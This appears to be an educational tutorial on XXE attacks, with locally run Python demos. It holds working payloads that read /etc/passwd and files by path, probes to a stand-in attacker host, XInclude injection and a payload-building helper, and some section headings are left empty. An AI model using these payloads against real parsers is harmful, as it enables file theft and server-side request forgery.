XXE - XML External Entity Attacks

Tools and Resources

How it works

Basics

  • XML - XML stands for "extensible markup language". XML is a language designed for storing and transporting data. Like HTML, XML uses a tree-like structure of tags and data. Unlike HTML, XML does not use predefined tags, and so tags can be given names that describe the data. Earlier in the web's history, XML was in vogue as a data transport format (the "X" in "AJAX" stands for "XML"). But its popularity has now declined in favor of the JSON format.
  • XML Entities - XML entities are a way of representing an item of data within an XML document, instead of using the data itself. Various entities are built into the specification of the XML language. For example, the entities &lt; and &gt; represent the characters < and >. These are metacharacters used to denote XML tags, and so must generally be represented using their entities when they appear within data.
  • DTD: Document Type Definition - The XML document type definition (DTD) contains declarations that can define the structure of an XML document, the types of data values it can contain, and other items. The DTD is declared within the optional DOCTYPE element at the start of the XML document. The DTD can be fully self-contained within the document itself (known as an "internal DTD"), loaded from elsewhere (known as an "external DTD"), or a hybrid of the two.
  • XML Custom Entities - XML allows custom entities to be defined within the DTD. For example:
    <!DOCTYPE foo [ <!ENTITY myentity "my entity value" > ]>
    This definition means that any usage of the entity reference &myentity; within the XML document will be replaced with the defined value: "my entity value".
  • XML External Entity - XML external entities are a type of custom entity whose definition is located outside of the DTD where they are declared.
    The declaration of an external entity uses the SYSTEM keyword and must specify a URL from which the value of the entity should be loaded. For example:
    <!DOCTYPE foo [ <!ENTITY ext SYSTEM "http://normal-website.com" > ]>
    The URL can use the file:// protocol, so external entities can also be loaded from a file. For example:
    <!DOCTYPE foo [ <!ENTITY ext SYSTEM "file:///path/to/file" > ]>
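As a rough illustration of how a parser treats these declarations, the Python sketch below (standard library only) parses one document that uses both a custom entity and an external entity pointing at a file:// URL. It parses the document twice: once with the SAX reader's `feature_external_ges` flag switched on, which mimics a parser that resolves external entities, and once with it off, which has been Python's default since 3.7.1. The temporary file and its `top-secret` contents are made-up stand-ins for a sensitive file on the server; `TextCollector` and `parse_text` are illustrative helpers, not part of any library.

```python
import io
import pathlib
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collects all character data the parser reports, including entity expansions."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_text(xml_bytes, resolve_external):
    """Parse xml_bytes and return its text content as one string."""
    parser = xml.sax.make_parser()
    # Controls whether SYSTEM entities are fetched (off by default since Python 3.7.1).
    parser.setFeature(feature_external_ges, resolve_external)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.chunks)


with tempfile.TemporaryDirectory() as tmp:
    # Hypothetical stand-in for a sensitive file on the server.
    secret = pathlib.Path(tmp) / "secret.txt"
    secret.write_text("top-secret")
    doc = (
        "<!DOCTYPE foo [\n"
        '  <!ENTITY myentity "my entity value" >\n'
        f'  <!ENTITY ext SYSTEM "{secret.as_uri()}" >\n'
        "]>\n"
        "<foo>&myentity; / &ext;</foo>"
    ).encode("utf-8")
    vulnerable_result = parse_text(doc, resolve_external=True)
    hardened_result = parse_text(doc, resolve_external=False)

print(repr(vulnerable_result))  # 'my entity value / top-secret'
print(repr(hardened_result))    # 'my entity value / '
```

The custom entity is expanded in both runs; only the run with external entity resolution enabled pulls in the contents of the file.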

Testing for XXE Vulnerabilities

  • Testing for file retrieval by defining an external entity based on a well-known operating system file and using that entity in data that is returned in the application's response.
  • Testing for blind XXE vulnerabilities by defining an external entity based on a URL to a system that you control, and monitoring for interactions with that system. The Burp Collaborator client is well suited to this purpose.
  • Testing for vulnerable inclusion of user-supplied non-XML data within a server-side XML document by using an XInclude attack to try to retrieve a well-known operating system file.

Attacks

XXE for retrieving files

  • You can retrieve an arbitrary file from the target's filesystem by modifying the submitted XML in two ways:
    • Introduce (or edit) a DOCTYPE element that defines an external entity containing the path to the file.
    • Edit a data value in the XML that is returned in the application's response, to make use of the defined external entity.
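Both steps can be scripted. The following Python sketch is a hypothetical helper, not part of any tool: it assumes the submitted body is a small XML document without namespaces and that you already know which element's value the application echoes back. The `stockCheck` request body is invented for the example, and `/etc/passwd` is used as a conventional target path.

```python
import xml.etree.ElementTree as ET


def add_file_entity(xml_text, target_tag, file_path, entity="xxe"):
    """Return xml_text with a DOCTYPE that defines an external entity for
    file_path, and with the first <target_tag> value replaced by a reference to it."""
    root = ET.fromstring(xml_text)
    target = root.find(f".//{target_tag}")
    if target is None:
        raise ValueError(f"no <{target_tag}> element in document")
    # ElementTree escapes "&" in text, so write a marker first and swap in
    # the raw entity reference after serialization.
    marker = "__XXE_MARKER__"
    target.text = marker
    body = ET.tostring(root, encoding="unicode").replace(marker, f"&{entity};")
    # Step 1: the DOCTYPE that defines the external entity.
    doctype = f'<!DOCTYPE {root.tag} [ <!ENTITY {entity} SYSTEM "file://{file_path}"> ]>'
    # Step 2: the edited body that uses it.
    return doctype + body


original = "<stockCheck><productId>381</productId><storeId>1</storeId></stockCheck>"
print(add_file_entity(original, "productId", "/etc/passwd"))
# <!DOCTYPE stockCheck [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>
```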

XXE to perform SSRF

  • To exploit an XXE vulnerability to perform an SSRF attack, you need to define an external XML entity using the URL that you want to target, and use the defined entity within a data value. If you can use the defined entity within a data value that is returned in the application's response, then you will be able to view the response from the URL within the application's response, and so gain two-way interaction with the back-end system. If not, then you will only be able to perform blind SSRF attacks.
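The two-way case can be reproduced locally. In this Python sketch, a throwaway HTTP server on 127.0.0.1 plays the role of an internal back-end system, and `vulnerable_parse` is a hypothetical stand-in for an application that resolves external entities (via the SAX reader's `feature_external_ges` flag) and reflects the parsed text in its response. The `/admin` path and the `internal-admin-data` body are made up for the demo.

```python
import http.server
import io
import threading
import urllib.request
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

# Send the parser's requests straight to localhost, ignoring any proxy settings.
urllib.request.install_opener(urllib.request.build_opener(urllib.request.ProxyHandler({})))


class InternalService(http.server.BaseHTTPRequestHandler):
    """Hypothetical back-end service that is only reachable from the server."""

    def do_GET(self):
        body = b"internal-admin-data"
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass  # keep the demo output quiet


class TextCollector(ContentHandler):
    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def vulnerable_parse(xml_bytes):
    """Parse with external entities enabled and return the text, as a reflecting app might."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, True)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.chunks)


server = http.server.HTTPServer(("127.0.0.1", 0), InternalService)
threading.Thread(target=server.serve_forever, daemon=True).start()
try:
    port = server.server_address[1]
    payload = (
        f'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://127.0.0.1:{port}/admin"> ]>'
        "<foo>&xxe;</foo>"
    ).encode("utf-8")
    reflected = vulnerable_parse(payload)
finally:
    server.shutdown()
    server.server_close()

print(reflected)  # internal-admin-data
```

If the application did not reflect the parsed text, the request to the back-end system would still be made; that is the blind SSRF case.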

Blind XXE attacks

  • Many instances of XXE vulnerabilities are blind. This means that the application does not return the values of any defined external entities in its responses, and so direct retrieval of server-side files is not possible.
  • The attack surface for XXE injection is obvious in many cases, because the application's normal HTTP traffic includes requests that contain data in XML format. In other cases it is less visible: XXE attack surface can also exist in requests that contain no XML at all, for example where user input is embedded into a server-side XML document, where uploaded files use an XML-based format, or where the server also accepts an XML content type.
  • You can often detect blind XXE by using the same technique as for XXE SSRF attacks, but pointing the external entity at a system that you control and monitoring for the resulting out-of-band network interaction. For example, you would define an external entity as follows:
    <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://f2g9j7hhkax.web-attacker.com"> ]>
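The detection side can be sketched locally as well. Here a small HTTP listener on 127.0.0.1 stands in for an attacker-controlled system such as Burp Collaborator, and `blind_app` is a hypothetical application that parses the XML with external entities enabled but never reflects entity values. A random token in the URL path plays the role of the unique subdomain in the example above, so each interaction can be matched to the probe that caused it.

```python
import http.server
import io
import secrets
import threading
import urllib.request
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

# Send the parser's requests straight to localhost, ignoring any proxy settings.
urllib.request.install_opener(urllib.request.build_opener(urllib.request.ProxyHandler({})))

seen_paths = []  # what the "attacker-controlled" listener has received


class Listener(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        seen_paths.append(self.path)  # record the interaction
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *args):
        pass


def blind_app(xml_bytes):
    """Hypothetical app: parses with external entities enabled, reflects nothing."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, True)
    parser.setContentHandler(ContentHandler())
    parser.parse(io.BytesIO(xml_bytes))
    return "OK"  # the response never contains entity values


server = http.server.HTTPServer(("127.0.0.1", 0), Listener)
threading.Thread(target=server.serve_forever, daemon=True).start()
try:
    token = secrets.token_hex(8)  # unique per probe
    url = f"http://127.0.0.1:{server.server_address[1]}/{token}"
    probe = f'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "{url}"> ]><foo>&xxe;</foo>'
    response = blind_app(probe.encode("utf-8"))
finally:
    server.shutdown()
    server.server_close()

print(response)                   # OK
print(f"/{token}" in seen_paths)  # True -> the parser made an out-of-band request
```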

XML Parameter entities

  • Sometimes, XXE attacks using regular entities are blocked, due to some input validation by the application or some hardening of the XML parser that is being used. In this situation, you might be able to use XML parameter entities instead. XML parameter entities are a special kind of XML entity which can only be referenced elsewhere within the DTD. For present purposes, you only need to know two things. First, the declaration of an XML parameter entity includes the percent character before the entity name:
    <!ENTITY % myparameterentity "my parameter entity value" >
    And second, parameter entities are referenced using the percent character instead of the usual ampersand:
    %myparameterentity;
    This means that you can test for blind XXE using out-of-band detection via XML parameter entities as follows:
    <!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://f2g9j7hhkax.web-attacker.com"> %xxe; ]>
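A parameter-entity probe needs no entity reference in the document body at all: the fetch happens while the DTD itself is processed. In this Python sketch, a small HTTP listener on 127.0.0.1 stands in for the attacker-controlled host, and the `/pe-probe` path is arbitrary. One assumption worth flagging: in CPython's expat-based SAX reader, the `feature_external_ges` flag also governs whether external parameter entities are fetched (an implementation detail); other parsers may expose a separate setting.

```python
import http.server
import io
import threading
import urllib.request
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

# Send the parser's requests straight to localhost, ignoring any proxy settings.
urllib.request.install_opener(urllib.request.build_opener(urllib.request.ProxyHandler({})))

hits = []


class Listener(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        hits.append(self.path)
        self.send_response(200)
        self.send_header("Content-Length", "0")  # empty DTD: nothing to declare
        self.end_headers()

    def log_message(self, *args):
        pass


server = http.server.HTTPServer(("127.0.0.1", 0), Listener)
threading.Thread(target=server.serve_forever, daemon=True).start()
try:
    url = f"http://127.0.0.1:{server.server_address[1]}/pe-probe"
    # Declared and referenced inside the DTD; the body <foo/> uses no entity.
    probe = f'<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "{url}"> %xxe; ]><foo/>'
    parser = xml.sax.make_parser()
    # Assumption: in CPython's expatreader this flag also enables external parameter entities.
    parser.setFeature(feature_external_ges, True)
    parser.setContentHandler(ContentHandler())
    parser.parse(io.BytesIO(probe.encode("utf-8")))
finally:
    server.shutdown()
    server.server_close()

print("/pe-probe" in hits)  # True -> fetched while processing the DTD
```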

Blind XXE for OOB Exfiltration

Blind XXE to retrieve data via error messages

Blind XXE via repurposing a local DTD

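  • When out-of-band interactions are blocked, it might still be possible to trigger error messages containing sensitive data, due to a loophole in the XML language specification. If a document's DTD uses a hybrid of internal and external DTD declarations, then the internal DTD can redefine entities that are declared in the external DTD. When this happens, the restriction on using an XML parameter entity within the definition of another parameter entity is relaxed. In practice, this means you can use a DTD file that already exists on the server's local filesystem as the external DTD, and redefine one of its parameter entities so that parsing fails with an error message containing the contents of the target file.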
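
XInclude attacks

  • Some applications receive client-submitted data, embed it on the server side into an XML document, and then parse the document. Because you do not control the entire XML document in this situation, you cannot define or modify a DOCTYPE element. Instead, you can attempt to use the XInclude element, which allows XML documents to be built from sub-documents.
  • An XInclude attack only requires control of a single data item that is placed into the server-side XML document: you put an XInclude element in that value, declare the XInclude namespace, and point the element at the file you want to retrieve.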
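The following Python sketch simulates this server-side pattern with the standard library's `xml.etree.ElementInclude` module, which processes `xi:include` elements. `check_stock` is a hypothetical handler that pastes the raw `productId` parameter into a `stockCheck` document, parses it, and expands XInclude elements; the attacker controls only that one value. The injected element declares the XInclude namespace and uses `parse="text"` so the target file is included as plain text rather than parsed as XML. A temporary file stands in for a sensitive server file; note that this particular loader takes a filesystem path in `href`, whereas other XInclude processors may expect a URL.

```python
import pathlib
import tempfile
import xml.etree.ElementTree as ET
from xml.etree import ElementInclude


def check_stock(product_id):
    """Hypothetical handler: embeds the raw parameter in an XML document,
    parses it, expands XInclude elements, then reads the productId value."""
    doc = f"<stockCheck><productId>{product_id}</productId><storeId>1</storeId></stockCheck>"
    root = ET.fromstring(doc)
    ElementInclude.include(root)  # default loader reads local files by path
    return "".join(root.find("productId").itertext())


with tempfile.TemporaryDirectory() as tmp:
    secret = pathlib.Path(tmp) / "secret.txt"
    secret.write_text("top-secret")
    # The attacker controls only the productId value, not the DOCTYPE.
    injected = (
        '<foo xmlns:xi="http://www.w3.org/2001/XInclude">'
        f'<xi:include parse="text" href="{secret}"/></foo>'
    )
    result = check_stock(injected)

print(result)  # top-secret
```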

XXE via file upload

XXE via modified content type

  • Most POST requests use a default content type that is generated by HTML forms, such as application/x-www-form-urlencoded. Some web sites expect to receive requests in this format but will tolerate other content types, including XML.
  • If the application tolerates requests containing XML in the message body, and parses the body content as XML, then you can reach the hidden XXE attack surface simply by reformatting requests to use the XML format.
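Reformatting a request is mechanical. The sketch below is a hypothetical helper that re-encodes a form-encoded body as XML and adjusts the headers. It assumes each form field name is a valid XML element name, wraps the fields in an arbitrary `root` element, and uses `text/xml` as the content type (some applications may expect `application/xml` instead). If the endpoint responds to the XML version as it did to the original form body, its XML parser is reachable with the payloads described above.

```python
from urllib.parse import parse_qsl
from xml.sax.saxutils import escape


def form_to_xml_request(form_body, root="root"):
    """Re-encode an application/x-www-form-urlencoded body as XML.

    Assumes every field name is a valid XML element name; the wrapper
    element name is arbitrary.
    """
    fields = "".join(
        f"<{name}>{escape(value)}</{name}>" for name, value in parse_qsl(form_body)
    )
    body = f'<?xml version="1.0" encoding="UTF-8"?><{root}>{fields}</{root}>'
    headers = {
        "Content-Type": "text/xml",
        # Length in bytes of the UTF-8 encoded body.
        "Content-Length": str(len(body.encode("utf-8"))),
    }
    return headers, body


headers, body = form_to_xml_request("productId=381&storeId=1")
print(body)
# <?xml version="1.0" encoding="UTF-8"?><root><productId>381</productId><storeId>1</storeId></root>
print(headers["Content-Type"], headers["Content-Length"])
```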